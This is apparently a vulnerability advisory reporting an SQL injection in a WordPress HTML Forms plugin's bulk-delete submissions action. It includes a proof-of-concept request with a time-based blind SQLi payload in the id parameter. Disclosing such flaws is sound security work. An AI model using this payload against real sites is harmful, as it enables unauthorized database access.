The plugin does not properly properly escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users
Access the submission page on https://example.com/wp-admin/admin.php?page=html-forms&view=edit&form_id=form_ID&tab=submissions Capture the request after performing a Move to Trash action, replace the Submission ID with the SQLi payload, e.g _hf_admin_action=bulk_delete_submissions&_wpnonce=nonce&id[]=1) AND (SELECT 2179 FROM (SELECT(SLEEP(5)))xaXr) AND (4033=4033
Nguyen Duy Quoc Khanh
Nguyen Duy Quoc Khanh
Yes
2022-11-07 (about 10 months ago)
2022-11-07 (about 10 months ago)
2022-11-07 (about 10 months ago)